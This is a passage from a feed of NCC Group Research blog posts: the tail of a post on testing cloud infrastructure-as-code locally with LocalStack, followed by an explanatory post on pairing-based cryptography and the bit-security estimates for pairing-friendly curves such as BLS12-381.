The technique we demonstrate in Aerides does include tradeoffs. It wholly hinges on LocalStack. Any delta between LocalStack’s API and the actual AWS APIs leads to unexpected behavior in dynamic tools. This ranges from errors/exceptions in the tools to false negatives/positives from the reporting. When trying to use different dynamic tools, we ran into several instances of these issues. We can help mitigate this disadvantage by making contributions to LocalStack and its underlying dependencies (i.e. Moto6). As LocalStack improves, these gaps can be reduced and the signals from dynamic cloud security tools become clearer.

Additionally, LocalStack covers a wide range of services from AWS and can mock several of the resources they make available. However, not all services/resources are available. Some services and resources are only available through LocalStack’s premium offering. This means there will be coverage gaps. Additionally, the engineers trying to use LocalStack will need to adjust their templates to accommodate these gaps.

However, the biggest benefit from utilizing LocalStack is speed. The actual process of standing up LocalStack, deploying the infrastructure-as-code, running dynamic tools, and running test cases altogether takes around thirty seconds for a small project with a few test cases. It can also be executed from an engineer’s development device rather than in CI processes. This is far faster than committing changes to a repository, then waiting for those changes to get picked up and deployed to a cloud provider (such as in a test/dev account/subscription/project), then executing the gathering/testing processes. This speedup scales with the number of resources (due to the number of HTTP requests made over the Internet versus via loopback). This is a nicer experience compared to pushing a change, then finding out a half-hour later that it created a major vulnerability in a live cloud environment.

References

  1. https://github.com/nccgroup/PMapper
  2. https://github.com/duo-labs/cloudmapper
  3. https://github.com/lyft/cartography
  4. https://localstack.cloud/
  5. https://github.com/toniblyx/my-arsenal-of-aws-security-tools
  6. https://github.com/spulec/moto

✇NCC Group Research

Estimating the Bit Security of Pairing-Friendly Curves

By: Giacomo Pope

Introduction

The use of pairings in cryptography began in 1993, when an algorithm developed by Menezes, Okamoto and Vanstone, now known as the MOV-attack, described a sub-exponential algorithm for solving the discrete logarithm problem for supersingular elliptic curves.1 It wasn’t until the following decade that efficient pairing-based algorithms were used constructively to build cryptographic protocols applied to identity-based encryption, short signature signing algorithms and three participant key exchanges.

These protocols (and many more) are now being adopted and implemented “in the wild”:

Paring-based protocols present an interesting challenge. Unlike many cryptographic protocols which perform operations in a single cryptographic group, pairing-based protocols take elements from two groups and “pair them together” to create an element of a third group. This means that when considering the security of a pairing-based protocol, cryptographers must ensure that any security assumptions (e.g. the hardness of the discrete logarithm problem) apply to all three groups.

The growing adoption of pairing-based protocols has inspired a surge of research interest in pairing-friendly curves; a special class of elliptic curves suitable for pairing-based cryptography. In fact, currently all practical implementations of pairing-based protocols use these curves. As a result, understanding the security of pairing-friendly curves (and their associated groups) is at the core of the security of pairing-based protocols.

In this blogpost, we give a friendly introduction to the foundations of pairing-based protocols. We will show how elliptic curves offer a perfect space for implementing these algorithms and describe at a high level the cryptographic groups that appear during the process.

After a brief review of how we estimate the bit security of protocols and the computational complexity of algorithms, we will focus on reviewing the bit-security of pairing-friendly curves using BLS-signatures as an example. In particular, we collect recent results in the state-of-the-art algorithms designed to solve the discrete logarithm problem for finite fields and explain how this reduces the originally reported bit-security of some of the curves currently in use today.

We wrap up the blogpost by discussing the real-world ramifications of these new attacks and the current understanding of what lies ahead. For those who wish to hold true to (at least) 128 bit-security, we offer references to new pairing-friendly curves which have been carefully generated with respect to the most recent research.

This blogpost was inspired by some previous work that NCC Group carried out for ZCash, which in-part discussed the bit-security of the BLS12-381 curve. This work was published as a public report.

Maths Note: throughout this blog post, we will assume that the reader is fairly comfortable with the notion of a mathematical group, finite fields and elliptic curves. For those who want a refresher, we offer a few lines in an Appendix: mathematical notation.

Throughout this blog post, we will use p to denote a prime and q = p^m, \; m>0 denote a prime power. It follows that \mathbb{F}_p is a prime field, and \mathbb{F}_{q} is prime-power field. We allow m = 1 so we can use \mathbb{F}_{q} when we wish to be generic. When talking about pairing elements, we will use the notation \mathbb{F}_{p^k} such that the embedding degree k is explicit.

Acknowledgements

Many thanks to Paul Bottinelli, Elena Bakos Lang and Phillip Langlois from NCC Group, and Robin Jadoul in personal correspondence for carefully reading drafts of this blog post and offering their expertise during the editing process.

Bilinear Pairings and Elliptic Curves

Pairing groups together

At a high level, a pairing is a special function which takes elements from two groups and combines them together to return an element of a third group. In this section, we will explore this concept, its applications to cryptography and the realisation of an efficient pairing using points on elliptic curves.

Let G_1, G_2 and G_T be cyclic groups of order r. For this blog post, we will assume an additive structure for G_1 and G_2 with elements P, Q and a multiplicative structure for the target group G_T. A pairing is a map: e : G_1 \times G_2 \to G_T which is:

  • Bilinear: e([a]P, [b]Q) = e(P,Q)^{ab}.
  • Non-degenerate: If P is non-zero, then there is a Q such that e(P,Q) \neq 1 (and vice-versa).

In the special case when the input groups G_1 = G_2, we say that the pairing is symmetric, and asymmetric otherwise.

For a practical perspective, let’s look at an example where we can use pairings cryptographically. Given a group with an efficient pairing e(\cdot, \cdot), we can use bilinearity to easily solve the decision Diffie-Hellman problem.2 Using a symmetric pairing, we can write

e([a]P, [b]P) = e(P,P)^{ab}, \qquad e(P, [c]P)= e(P,P)^c.

Therefore, given the DDH triple ([a]P, [b]P, [c]P), we can solve DDH by checking whether

e([a]P, [b]P) \stackrel{?}{=} e(P, [c]P),

which will be true only if and only if c = ab.

Pairing Points

🤓 The next few sections have more maths than most of the post. If you’re more keen to learn about security estimates and are happy to just trust that we have efficient pairings which take points on elliptic curves and return elements of \mathbb{F}^*_{p^k}, you can skip ahead to What Makes Curves Friendly? 🤓

Weil Beginnings

As the notation above may have hinted, one practical example of a bilinear pairing is when the groups G_1 and G_2 are generated by points on an elliptic curve. In particular, we will consider elliptic curves defined over a finite field: E(\mathbb{F}_q). We have a handful of practical bilinear pairings that we could use, but all of them take points on curves as an input and return an element of the group \mathbb{F}^*_{p^k}.

The first bilinear pairing for elliptic curve groups was proposed in 1940 by André Weil, and it is now known as the Weil pairing. Given an elliptic curve E(\mathbb{F}_q) with a cyclic subgroup G of order r, the Weil pairing takes points in the r-torsion E(\mathbb{F}_{p^k})[r] and returns an rth root of unity in \mathbb{F}^*_{p^k} for some integer k \geq 1.3

The r-torsion of the curve is the group E(\mathbb{F}_{q})[r] which consists of all the points on the curve which have order r: E(\mathbb{F}_{q})[r] = \{P \; | \; rP = \mathcal{O} , P \in E(\mathbb{F}_q) \}. The integer k appearing in the target group is called the (Weil) embedding degree and is the smallest integer k such that E(\mathbb{F}_{p^k})[r] has r^2 elements.4

To compute the value of the Weil pairing, you first need to be able to compute rational functions f_P and f_Q with a prescribed divisor.5 The Weil pairing is the quotient of these two functions:

e: E(\mathbb{F}_{p^k})[r] \times E(\mathbb{F}_{p^k})[r] \to \mathbb{F}^*_{p^k}, \qquad e(P,Q) = \frac{f_P(\mathcal{D}_Q)}{f_Q(\mathcal{D}_P)},

where the rational function f_S has a divisor r(S) - r(\mathcal{O}) and \mathcal{D}_S is a divisor (S) - \mathcal{O}, for point on the curve S \in E(\mathbb{F}_{p^k}).

When Weil first proposed his pairing, algorithms to compute these special functions ran in exponential time in r , so to compute the pairing for a cryptographically suitable curve was impossible.

It wasn’t until 1986, when Miller introduced his linear time algorithm to compute functions on algebraic curves with given divisors, that we could think of pairings in a cryptographic context. Miller’s speed up can be thought of in analogy to how the “Square and Multiply” formula speeds up exponentiation and takes \log(r) steps. Similar to “Square and Multiply”, the lower the hamming weight of the order r, the faster Miller’s algorithm runs. For a fantastic overview of working with Miller’s algorithm in practice, we recommend Ben Lynn’s thesis.

Tate and Optimised Ate Pairings

The Weil pairing is a natural way to introduce elliptic curve pairings (both historically and conceptually), but as Miller’s algorithm must be run twice to compute both f_P and f_Q, the Weil pairing can affect the performance of a pairing based protocol.

In contrast, Tate’s pairing t(\cdot, \cdot) requires only a single call to Miller’s algorithm and can be computed from

t(P, Q) = f_P(\mathcal{D}_Q)^{\frac{p^k-1}{r}},

leading to more efficient pairing computations. We can relate the Weil and Tate pairings by the relation:

e(P,Q)^{\frac{p^k-1}{r}} = \frac{t(P,Q)}{t(Q,P)}.

The structure of the input and output for the Tate pairing is a little more complicated than the Weil pairing. Roughly, the first input point P should still be in the r-torsion, but now the second point Q need not have order r. The output of the tate pairing is an element of the quotient group \mathbb{F}^*_{p^k} / (\mathbb{F}^*_{p^k})^r.

For the Weil pairing, the embedding degree was picked to ensure we had all r^2 of our torsion points in E(\mathbb{F}_{p^k})[r]. However, for the Tate pairing, we instead only require that \mathbb{F}_{p^k} contains the rth roots of unity, which is satisfied when the order of the curve point r divides (p^k - 1).6

Due to the Balasubramanian-Koblitz Theorem, for all cases other than k = 1, the Weil and Tate embedding degrees are the same. Because of this, for the rest of this blog post we will just refer to k as the embedding degree and think of it in Tate’s context; as finding one number to divide another is simpler than extending a field to ensure that the r-torsion has been totally filled!

The exponentiation present in the Tate pairing can be costly, but it can be further optimised, and for most implementations of pairing protocols, a third pairing called the Ate-pairing is picked for best performance. As with the Weil pairing, the Ate pairing can be written in terms of the Tate pairing. The optimised Ate pairing has the shortest Miller loop and is the pairing of choice for modern implementations of pairing protocols.

What Makes Curves Friendly?

When picking parameters for cryptographic protocols, we’re concerned with two problems:

  • The protocol must be computationally efficient.
  • The best known attacks against the protocol must be computationally expensive.

Specifically for elliptic curve pairings, which map points on curves to elements of \mathbb{F}_{p^k}, we need to consider the security of the discrete logarithm problem for all groups, while also ensuring that computation of the chosen pairing is efficient.

For the elliptic curve groups, it is sufficient to ensure that the points used generate a prime order subgroup which is cryptographically sized. More subtle is how to pick curves with the “right” embedding degree.

  • If the embedding degree is too large, computing the pairing is computationally very expensive.
  • If the embedding degree is too small, sub-exponential algorithms can solve the discrete log problem in \mathbb{F}^*_{p^k} efficiently.

Given a prime p and picking a random elliptic curve E(\mathbb{F}_p), the expected embedding degree is distributed (fairly) evenly between 0 < k < p. As we are working with cryptographically sized primes p, the embedding degree is then also expected to be cryptographically sized and the probability to find small k becomes astronomically small.7 Aside from the complexity of computing pairings when the degree is so large, we would also very quickly run out of memory even trying to represent an element of \mathbb{F}^*_{p^k}.

One trick to ensure we find curves with small embedding degree is to consider supersingular curves. For example, picking a prime p \equiv 3 \pmod 4 and defining the curve

E(\mathbb{F}_p): y^2 = x^3 + x,

we always find that the number of points on the curve: \# E(\mathbb{F}_p) = p + 1. Picking k = 2 , we can factor (p^2 - 1) = (p+1)(p-1). As the order of the curve \#E(\mathbb{F}_p) divides (p^2 - 1) , we see that the embedding degree is k = 2.

The problem with this curve is that ensuring the discrete log problem in \mathbb{F}_{p^2} is cryptographically hard would require a p so large, working with the curves themselves would be too cumbersome. Similar arguments with primes of different forms allow the construction of other supersingular curves, but whatever method is used, all supersingular curves have k \leq 6, which is usually considered too small for pairing-based protocols.

If we’re not finding these curves randomly and we can’t use supersingular curves, then we have to sit down and find friendly curves carefully using mathematics. In particular, we use complex multiplication to construct our special elliptic curves. This has been a point of research for the past twenty years, and cryptographers have been carefully constructing families of curves which:

  • Have large, prime-order subgroups.
  • Have small (but not too small!) embedding degree, (usually) between 12 \leq k \leq 24.

Additionally, the following conditions are considered “nice-to-have”:

  • A carefully picked field characteristic p to allow for fast modular arithmetic.
  • A curve group order r with low hamming weight to speed up Miller’s loop.

Curves with these properties are perfect for pairing-based protocols and so we call them pairing-friendly curves!

A invaluable repository of pairing-friendly curves and links to corresponding references is Aurore Guillevic’s Pairing Friendly Curves. Guillevic is a leading researcher in estimating the security of pairing friendly curves and has worked to tabulate many popular curves and their best use cases.

A familiar face: BLS12-381

In 2002, Baretto, Lynn and Scott published a paper: Constructing Elliptic Curves with Prescribed Embedding Degrees, and curves generated with this method are in the family of “BLS curves”.

The specific curve BLS12-381 was designed by Sean Bowe for ZCash after research by Menezes, Sarkar and Singh showed that the Barreto–Naehrig curve, which ZCash had previously been using, had a lower than anticipated security.

This is a popular curve used in many protocols that we see while auditing code here at NCC, so it’s a perfect choice as an example of a pairing-friendly curve.

Let’s begin by writing down the curve equations and mention some nice properties of the parameters. The two groups G_1 \subset E_1 and G_2 \subset E_2 have a 255 bit prime order r and are generated by points from the respective curves:

E_1(\mathbb{F}_p) : y^2 = x^3 + 4, \\ \\ E_2(\mathbb{F}_{p^2}) : y^2 = x^4 + 4(1 + u), \qquad \mathbb{F}_{p^2} = \mathbb{F}_p[u] / (u^2 + 1).

The embedding degree is k = 12, G_T = \mathbb{F}^*_{p^{12}}, and the characteristic of the field p has 381 bits (hopefully now the name BLS12-381 makes sense!).

The parameters p and r have some extra features baked into them too. There is in fact a single parameter z = -\texttt{0xd201000000010000} which generates the value of both the characteristic p and the subgroup order r:

p = \tfrac{1}{3} (z - 1)^2(z^4 - z^2 + 1) + z, \qquad r = z^4 - z^2 + 1.

The low hamming weight of z reduces the cost of the Miller loop when computing pairings and to aid with zkSnark schemes, r-1 is chosen such that it is divisible by a large power of two (precisely, 2^{32}).

Ben Edgington has a fantastic blog post that carefully discusses BLS12-381, and is a perfect resource for anyone wanting to know more about this particular curve. For a programming-first look at this curve, NCC’s Eric Schorn has written a set of blog posts implementing pairing on BLS12-381 using Haskell and goes on to look at optimisations of pairing with BLS12-381 by implementing Montgomery arithmetic in Rust and then further improves performance using Assembly.

Something Practical: BLS Signatures

Let’s finish this section with an example, looking at how a bilinear pairing gives an incredibly simple short signature scheme proposed by Boneh, Lynn and Shacham.9 A “short” signature scheme is a signing protocol which returns small signatures (in bits) relative to their cryptographic security.

As above, we work with groups G_1, G_2, G_T of prime order r. For all practical implementations of BLS-signatures, G_1 and G_2 are prime order groups generated by points on elliptic curves and G_T = \mathbb{F}^*_{p^k} where k is the embedding degree. We could, for example, work with the above BLS12-381 curve and have k = 12.

Key Generation is very simple: we pick a random integer x, within the range 0 < x <r. The corresponding public key is a = [x]g \in G_1, where g is a generator of G_1.

To sign a message m, we represent the hash of this message H(m) as a point h \in G_2 on the curve.8 The signature is found by performing scalar multiplication of the point: \sigma = [x]h.

Pairing comes into play when we verify the signature \sigma. The verifier uses the broadcast points (a, \sigma) and the message m to check whether

e(g, \sigma) \stackrel{?}{=} e(a, h)

Where the scheme uses the bilinearity of the pairing:

e(g, \sigma) = e(g, [x]h) = e(g, h)^x = e([x]g, h) = e(a, h).

Picking groups

For pairing-friendly curves such as BLS or Barreto-Naehrig (BN) curves, G_1 has points with coordinates in \mathbb{F}_p while G_2 has points with coordinates in \mathbb{F}_{p^2}. This means that the compressed points of G_2 are twice as large as those from G_1 and operations with points from G_2 are slower than those from G_1.

When designing a signature system, protocols can pick for public keys or signatures to be elements of G_1, which would speed up either key generation or signing respectively. For example, ZCash pick G_1 for their signatures, while Ethereum have picked G_1 for their public keys in ETH2. Note that neither choice affects the benchmarks for verification; this is instead limited by the size (and Hamming weight) of the integers k, r and p.

A Bit on Bit Security

Infeasible vs. Impossible

Cryptography is built on a set of very-hard but not impossible problems.

For authenticated encryption, such as AES-GCM or ChaCha20-Poly1305, correctly guessing the key allows you to decrypt encrypted data. For asymmetric protocols, whether it’s computing a factor of an RSA modulus, or the private key for an elliptic curve key-pair, you’re usually one integer away from breaking the protocol. Using the above BLS signature example, an attacker knowing Alice’s private key x would allow them to impersonate Alice and sign any chosen message.

Cryptography is certainly not broken though. To ensure our protocols are secure, we instead design problems which we believe are infeasible to find a solution to given reasonable amount of time. We often describe the complexity of breaking a cryptographic problem by estimating the number of operations we would need to perform to correctly recover the secret. If a certain problem requires performing 2^n operations, then we call this an n bit-strength problem.10

As an example, let’s consider AES-256 where the key is some random 256-bit sequence.11 Currently, the best known attack to decrypt a given AES ciphertext, encrypted with an unknown key, is to simply guess a random key and attempt to decrypt the message. This is known as a brute-force attack. Defining our operation as: “guess a key, attempt to decrypt”, we’ll need at most 2^{256} operations to stumble upon the secret key. We therefore say that AES-256 has 256-bit security. This same argument carries over exactly to AES-128 and AES-192 which have 128- and 192-bit security respectively, or the ChaCha/Salsa ciphers which have either 128 or 256-bit keys.

How big is big?

Humans can have a tough time really appreciating how large big-numbers are,12 but even for the “lower” bound of 128-bit security, estimates end up comparing computation time with a galaxy of computers working for the age of the universe before terminating with the correct key! For those who are interested in a visual picture of quite how big this number is, there’s a fantastic video by 3blue1brown How Secure is 256 bit security and if you’re skimming this blogpost and would rather do some reading, this StackExchange question has some entertaining financial costs for performing 2^{256} operations.

Asymmetric Bit-Security

For a well-designed symmetric cipher, the bit-strength is set by the cost of a brute-force search across the key-space. Similarly for cryptographic hash functions, the bit-strength for preimage resistance is the bit-length of the hash output (collision resistance is always half of this due to the Birthday Paradox).

For asymmetric protocols, estimating the precise bit-strength is more delicate. The security of these protocols rely on mathematical problems which are believed to be computationally hard. For RSA, security is assured by the assumed hardness of integer factorisation. For Diffie-Hellman key exchanges, security comes from the assumed hardness of the computational Diffie-Hellman problem (and by reduction, the discrete logarithm problem).

Although we can still think of breaking these protocols by “guessing” the secret values (a prime factor of a modulus, the private key of some elliptic curve key-pair), our best attempts are significantly better than a brute-force approach; we can take the mathematical structure which allows the construction of these protocols and build algorithms to recover secret values from shared, public ones.

To have an accurate security estimate for an asymmetric protocol, we must then have a firm grasp of the computational complexity of the state-of-the-art attacks against the specific hard problem we consider. As a result, parameters of asymmetric protocols must be fine-tuned as new algorithms are discovered to maintain assurance of a certain bit-strength.

To attempt to standardise asymmetric ciphers, cryptographers generate their parameters (e.g. picking the size of the prime factors of an RSA modulus, or the group order for a Diffie-Hellman key-exchange) such that the current best known attacks require (at least) 2^{128}, 2^{192} or 2^{256} operations.

RSA Estimates: Cat and Mouse

As a concrete example, we can look at the history of estimates for RSA. When first presented in 1976, Rivest, Shamir and Adleman proposed their conservative security estimates of 664-bit moduli, estimating 4 billion years (corresponding to \sim 2^{77} operations) to successfully factor. Their largest modulus proposed had 1600 bits, with an estimated 130 bit-strength based off the state of the art factoring algorithm at the time (due to Schroeppel).

The RSA algorithm gave a new motivation for the design of faster factoring algorithms, each of which would push the necessary bit-size of the modulus higher to ensure that RSA could remain safe. The current record for integer factorisation is a 829 bit modulus, set Feb 28th, 2020 taking “only” 2700 core years. Modern estimates require a 3072 bit modulus to achieve at least 128-bit security for RSA implementations.

Estimating computational complexity

Let’s finish this section with a discussion of how we denote computational complexity. The aim is to try and give some intuition for “L-notation” used mainly by researchers in computational number theory for estimating the asymptotic complexity of their algorithms.

Big-O Notation

A potentially more familiar notation for our readers is “Big-\mathcal{O}” notation, which estimates the number of operations as an upper bound based on the input to the algorithm. For an input of length n, a linear time algorithm runs in \mathcal{O}(n), which means if we double the length of n, we would expect the running time to also double. A naive implementation of multiplication of numbers with n digits runs in \mathcal{O}(n^2) or quadratic time. Doubling the length of the input, we would expect a four-times increase in computation time. Other common algorithms run in logarithmic: \mathcal{O}(\log n), polylogarithmic: \mathcal{O}((\log n)^c) or polynomial time: \mathcal{O}(n^c), where c is a fixed constant. An algorithm which takes the same amount of time regardless of input length is known as constant time, denoted by \mathcal{O}(1).

In order to protect against side-channel attacks, constant time algorithms are particularly important when implementing cryptographic protocols. If a secret value is supplied to a variable-time algorithm, an attacker can carefully measure the computation time and learn about private information. By assuring algorithms run in constant time, side-channel attacks are unable to learn about private values when they are supplied as arguments. Note that constant does not (necessarily) mean fast! Looking up values in hashmaps is \mathcal{O}(1) and fast. Computing the scalar multiplication of elliptic curve points, given a fixed elliptic curve E(\mathbb{F}_q), for cryptographic use should be \mathcal{O}(1), but this isnt a particularly fast thing to do! In fact, converting operations to be constant time in cryptography will often slow down the protocol, but it’s a small price to protect against timing attacks.

As a final example, we mention an algorithm developed by Shanks which is a meet in the middle algorithm for solving the discrete logarithm problem for a generic Abelian group. It is sufficient to consider prime order groups, as the Pohlig-Hellman algorithm allows us to reduce the problem for composite order groups into its prime factors, reconstructing the solution using the Chinese remainder theorem.

For a group of prime order p, a naive brute-force attack for the discrete logarithm problem would take at most \mathcal{O}(p) operations. Shanks’ Baby-Step-Giant-Step (BSGS) algorithm runs in two stages, and like all meet in the middle algorithms, the time complexity of the algorithm can be reduced with a time/space trade off.

The BSGS algorithm takes in group elements P,Q \in G and looks for an integer n such that P = [n]Q. First we perform the baby steps, where M = \lceil{\sqrt{p}}\;\rceil multiples of R_i = [x_i]P are computed and stored in a hashmap. Next, the giant steps, where up to M group elements S_j = Q + [y_j]P are computed. At each giant step, a check for S_j = R_i is performed. When a match is found, the algorithm terminates and returns n = x_i - y_j. All in, the BSGS takes \mathcal{O}(\sqrt{p}) operations to solve the discrete logarithm problem and requires \mathcal{O}(\sqrt{p}) space for the hashmap. Pollard’s rho algorithm achieves the same \mathcal{O}(\sqrt{p}) upper bound time complexity, without the need to build the large hashmap, which can be prohibitively expensive as the group’s order grows.

L-notation

L-notation is a specialised notation used for many of the best-case time complexity approximations for cryptographically hard problems such as factoring, or solving the discrete logarithm for finite fields.

L-notation gives the expected time complexity for an algorithm with input of length n as we allow the length to become infinitely large:

L_n[\alpha, c] = \exp \left\{ (c + o(1))(\ln n)^\alpha (\ln \ln n)^{1-\alpha} \right\}

Despite the intimidating expression, we can get a rough picture by understanding how the size of \alpha and c effect expected computational complexity. For the following, we consider the complexity on the size of the input n.
  • When \alpha \in (0,1) we say an algorithm is sub-exponential
  • When \alpha = 0 the complexity reduces to polynomial time: \mathcal{O}((\log n)^c)
  • When \alpha = 1 the complexity is equivalent to exponential time: \mathcal{O}(n^c)

For improvements, small reductions in c marginally improve performance, while reductions in \alpha usually are linked with significant improvement of an algorithm’s performance. Efforts to reduce the effect of the o(1) term are known as “practical improvements” and allow for minor speed-ups in computation time, without adjusting the complexity estimate.

For cryptographers, L-notation appears mostly when considering the complexity of integer factorisation, or solving the discrete logarithm problem in a finite field. In fact, these two problems are intimately related and many sub-exponential algorithms suitable for one of these problems have been adapted to the other.13

The first sub-exponential algorithm for integer factorisation was the index-calculus attack, developed by Adleman in 1979 and runs in L_n[\frac{1}{2}, \sqrt{2}]. Two years later, Pomerance (who also was the one who popularised L-notation itself) showed that his quadratic number field sieve ran asymptotically faster, in L_n[\frac{1}{2}, 1] time. Lenstra’s elliptic curve factoring algorithm runs in L_p[\frac{1}{2}, \sqrt{2}], with the interesting property that the time is bounded by the smallest prime factor p of n, rather than the number n we wish to factor itself.

The next big step was due to Pollard, Lenstra, Lenstra and Manasse, who developed the number field sieve; an algorithm designed for integer factorisation which would be adapted to also solving the discrete logarithm problem in \mathbb{F}_q^*. Their improved algorithm reduced \alpha in the L-complexity, with an asymptotic running time of L_n[\frac{1}{3},c].

Initially, the algorithm was designed for a specific case where the input integer was required to have a special form: n = r^e \pm s, where both r and s are small. Because of this requirement, this version is known as the special number field sieve (SNFS) and has c = \sqrt[3]{\frac{32}{9}} . This is great for numbers such as the Mersenne numbers: 2^n - 1, but fails for general integers.

Efforts to generalise this algorithm resulted in the general number field sieve (GNFS), with only a small increase of c = \sqrt[3]{\frac{64}{9}} \simeq 1.9 in the complexity. Very quickly, the GNFS was adapted to solving discrete logarithm problems in \mathbb{F}^*_p, but it took another ten years before this was further generalised for \mathbb{F}^*_{q} and renamed as the tower number field sieve (TNFS), which has the same complexity as the GNFS.

As a “hand-wavey” approximation, problems are cryptographically hard when the input has a few hundred bits for \mathcal{O}(\sqrt{n}) complexity and a few thousand bits for sub-exponential complexity. For example, if the best known attack runs in \mathcal{O}(\sqrt{n}) time, we would need n to have 256 bits to ensure 128 bit-strength. For RSA, which can be factored in \sim L_n[\frac{1}{3}, 1.9] time, we need a modulus of 3072 bits to reach 128-bit security.

Estimating the bit security of pairing protocols

With an overview of pairings and complexity estimation for asymmetric protocols, let’s combine these two areas together and look at how we can estimate the security of pairing-friendly curves.

As a concrete example, let’s return to the BLS signature scheme explained at the beginning of the post, and study the assumed hard problems of the protocol together with the asymptotic complexity of their best-known attacks. This offers a great way to look at the security assumptions of a pairing protocol in a practical way. We can take what we study here and apply the same reasoning to any pairing-based protocol which relies on the hardness of the computational Diffie-Hellman problem for its security proofs.

In a BLS signature protocol, the only private value is the private key x which is bounded within the interval 0 < x < r. If this value can be recovered from any public data, the protocol is broken and arbitrary data can be signed by an attacker. We can therefore estimate the bit-security of a pairing-friendly curve in this context by estimating the complexity to recover x from the protocol.

Note: for the following discussion we assume the protocol is implemented as intended and attacks can only come from the solution of problems assumed to be cryptographically hard. Implementation issues such as side-channel attacks, small subgroup attacks or bad randomness are assumed to not be present.

We assume a scenario where Alice has signed a message m with her private key x. Using Alice’s public key a = [x]g_1, Bob will attempt to verify her signature \sigma = [x]h before trusting the message. Eve, our attacker, wants to learn the value of x such that she can sign arbitrary messages while impersonating Alice.

In a standard set up, Eve has access to the following data:

  • Protocol parameters: The pairing-friendly curves E_1, E_2, the characteristic p and the embedding degree k (and hence G_T = \mathbb{F}^*_{p^k})
  • Pairing groups: The generators of the prime order subgroups G_1, G_2 and their generators g_i \in G_i
  • Alice’s public key: a = [x]g_1 \in G_1
  • Alice’s signature of the message \sigma = [x]h \in G_2 as well as the message m

Additionally, using these known values Eve can efficiently compute

  • The message as a curve point h = H(m) \in G_2 using the protocol’s chosen hash_to_curve algorithm
  • Elements of the target group: s = e(g_1, h) and t = e(a, h) = e(g_1, \sigma) = s^x \in G_T

To recover the private key, Eve has the option to attempt to solve the discrete log problem in any of the three groups G_1, G_2 and G_T:

x = \log_{g_1}(a), \qquad x = \log_{h}(\sigma), \qquad x = \log_{s}(t)

The bit-security for the BLS-signature is therefore the minimum number of operations needed to be performed to solve any of the three problems.

Elliptic Curve Discrete Logarithm Problem

Given a point and its scalar multiple: P, Q = [n]P \in E(\mathbb{F}_q), the elliptic curve discrete logarithm problem (ECDLP) is to recover the value of n. Since Miller (1986) and Koblitz (1987) independently suggested using this problem for cryptographic protocols, no attacks have been developed for generic curves which are any faster than those which we have for a generic abelian group.14

Therefore, to solve either of the first two problems:

x = \log_{g_1}(a), \qquad x = \log_{h}(\sigma) ,

Eve has no choice but to perform \mathcal{O}(\sqrt{r}) curve operations to recover the value of x. This makes estimating the bit security of these two problems very easy. To enjoy n-bit security for these problems, we only need to ensure that the prime order r has at least 2n-bits. Remember that this is only true when the subgroup has prime order. If r was composite, then the number of operations would be \mathcal{O}(\sqrt{p}), where p is the largest prime factor of r, reducing the security of the curve.

Note: As G_1 is usually generated from points on the curve E_1(\mathbb{F}_p) while E_2(\mathbb{F}_{p^2}) is defined over the extension field, the CPU time to solve problem one will be quicker than problem two, as an individual operation on E_1 will be more efficient than that of E_2.

Finite Field Discrete Logarithm Problem

In contrast to the group of points on an elliptic curve, mathematicians have been able to use the structure of the finite fields \mathbb{F}_{q} to derive sub-exponential algorithms to solve the discrete logarithm problem.

Up until fairly recently, the best known attack for solving the discrete logarithm problem in \mathbb{F}_{q}^*, was the tower number field sieve, which runs in L_q[\frac{1}{3}, \sqrt[3]{\frac{64}{9}}] time. To reach 128 bit security, we would need a 3072 bit modulus q; for pairing-friendly curves with a target group \mathbb{F}_{p^k}^*, we would then need the characteristic of our field to have \sim{3072}/{k} bits. Additionally, if we work within a subgroup of \mathbb{F}_q^*, this subgroup must have an order where the largest prime factor has at least 256 bits to protect against generic attacks such as Pollard’s Rho, or BSGS.

Just as with the original SNFS, where factoring numbers in a special form had a lower asymptotic complexity, recent research in solving the discrete logarithm problem for fields \mathbb{F}^*_{p^k} shows that when either p or k has certain properties the complexity is lowered:

  • The Special Number Field Sieve for \mathbb{F}_{p^n} , showed that when p has a sparse representation, such as the Solinas primes used in cryptography for efficiency of modular arithmetic, the complexity is reduced to L_{p^k}[\frac{1}{3}, c] for c = \lambda \sqrt[3]{\frac{32}{9}} where \lambda is some small multiplicative constant. This factor reduces to one when the primes are large enough.
  • The Extended Tower Number Field Sieve (exTNFS) shows that when we can non-trivially factor k = \eta \kappa, the complexity can reduce to L_{p^k}[\frac{1}{3}, \sqrt[3]{\frac{48}{9}}]. Additionally, this can be used together with the progress from the SNFS allowing a complexity of L_{p^k}[\frac{1}{3}, \sqrt[3]{\frac{32}{9}}], even for medium15 sized primes. The combination of advances is referred to as the SexTNFS.

In pairing-friendly curves, the characteristic of the fields are chosen to be sparse for performance, and the embedding degree is often factorable, e.g. k=12 for both BLS12 and the BN curves. This means the bit-security of many pairing-friendly curves should be estimated by the complexity of the special case SexTNFS, rather than the GNFS.

New Estimates for pairing-friendly curves

Discovery of the SexTNFS meant almost all pairing-friendly curves which had been generated prior had to be re-evaluated to estimate the new bit-security of the discrete logarithm problem.

This was first addressed in Challenges with Assessing the Impact of NFS Advances on the Security of Pairing-based Cryptography (2016), where among other estimates, they conducted experiments for the complexity 256 bit BN curve, which had a previous estimated security of 128 bits. With the advances of the SexTNFS, they estimated a new complexity between 150 and 110 bit security, bounded by the value of the constants appearing in the o(1) term in L_n[\alpha, c].

The simplification of o(1) = 0 was graphed in Updating key size estimations for pairings (2019; eprint 2017) and allows an estimate of expected key sizes for pairing-friendly curves. With the advances of the SexTNFS, we must increase the bit length of q = p^k to have at approximately 5004 bits for 128 bit security and 12871 bits for 192 bit security.

Diagram of bit strength estimates for TNFS, exTNFS and SexTNFS

In the same paper, they argue that precise analysis of the o(1) constant term must be understood, especially for the newer exTNFS and SexTNFS. By using careful polynomial selection in the sieving process, they estimate that the 256-bit BN curve has only 100 bit security, and other pairing-friendly curves will be similarly effected. They conclude that for 128 bit security, we should be considering pairing-friendly curves with larger primes, such as:

  • A BLS-12 curve over a 461-bit field (previously 381-bit)
  • A BN curve over a 462-bit field (previously 256-bit)

Guillevic released A short-list of pairing-friendly curves resistant to Special TNFS at the 128-bit security level (2019) looking again at the estimated bit security of curves and published a list of the best curves for each case with (at least) 128 bit security. Additionally, there is an open-source repository of SageMath code useful for estimating the security of a given curve https://gitlab.inria.fr/tnfs-alpha/alpha.

In short, Guillevic recommends

For efficient non-conservative pairings, choose BLS12-381 (or any other BLS12 curve or Fotiadis–Martindale curve of roughly 384 bits), for conservative but still efficient, choose a BLS12 or a Fotiadis–Martindale curve of 440 to 448 bits.

with the motivation that

The security between BLS12-446 and BLS12-461 is not worth paying an extra machine word, and is close to the error margin of the security estimate.

